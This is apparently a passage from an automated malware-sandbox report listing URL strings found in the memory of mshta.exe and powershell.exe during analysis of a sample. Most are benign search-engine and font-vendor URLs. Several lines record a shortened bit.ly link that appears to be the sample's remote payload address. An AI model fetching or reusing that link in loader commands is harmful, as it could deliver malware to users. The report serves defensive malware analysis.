Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://price.ru/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://rover.ebay.com
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: mshta.exe, 00000002.00000003.1627864631.021A8000.00000004.sdmp, mshta.exe, 00000002.00000003.1628004810.0225E000.00000004.sdmp, blog-page[1].htm.2.dr	String found in binary or memory: http://schema.org/BlogPosting
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.about.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.alice.it/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.aol.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.aol.in/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.auone.jp/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.chol.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.daum.net/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.ebay.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.ebay.de/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.ebay.es/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.ebay.in/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.ebay.it/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.empas.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.interpark.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.lycos.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.nate.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.naver.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.nifty.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.rediff.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.sify.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search.yam.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://suche.aol.de/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://suche.web.de/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: mshta.exe, 00000002.00000002.1666486840.05620000.00000008.sdmp	String found in binary or memory: http://treyresearch.net
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://udn.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://uk.ask.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://video.globo.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://web.ask.com/
Source: mshta.exe, 00000002.00000002.1666486840.05620000.00000008.sdmp	String found in binary or memory: http://www.%s.com
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.amazon.de/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.ascendercorp.com/
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.htmlt
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.ask.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.baidu.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.bethmardutho.org.P
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	String found in binary or memory: http://www.bitly.com/
Source: mshta.exe, 00000002.00000002.1660917204.00124000.00000004.sdmp	String found in binary or memory: http://www.bitly.com/8U
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, mshta.exe, 00000002.00000002.1661576697.00510000.00000004.sdmp, mshta.exe, 00000002.00000003.1637870561.00124000.00000004.sdmp	String found in binary or memory: http://www.bitly.com/SexoPhone2
Source: mshta.exe, 00000002.00000000.1604427885.00010000.00000004.sdmp, mshta.exe, 00000002.00000002.1660841004.000E0000.00000004.sdmp, mshta.exe, 00000002.00000003.1604735017.00010000.00000004.sdmp	String found in binary or memory: http://www.bitly.com/SexoPhone2C:
Source: mshta.exe, 00000002.00000002.1660828837.000D0000.00000004.sdmp	String found in binary or memory: http://www.bitly.com/SexoPhone2HEAP_SIGNATUREX
Source: mshta.exe, 00000002.00000003.1637870561.00124000.00000004.sdmp	String found in binary or memory: http://www.bitly.com/SexoPhone2er
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.c-and-g.co.jp
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000002.00000002.1661125486.00192000.00000004.sdmp, powershell.exe, 0000000C.00000002.1806800198.04320000.00000004.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.expedia.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.fonts.com
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.galapagosdesign.com/
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.google.co.in/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.google.com.br/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.google.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.google.cz/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.google.de/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.google.es/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.google.fr/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.google.it/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.google.pl/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.google.ru/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.google.si/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.iask.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.mtv.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.najdi.si/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.ncst.ernet.in/~rkjoshi
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.orange.fr/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.rtl.de/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.sakkal.com
Source: mshta.exe, 00000002.00000002.1664648911.02DE0000.00000002.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: mshta.exe, 00000002.00000002.1666681404.056D9000.00000008.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
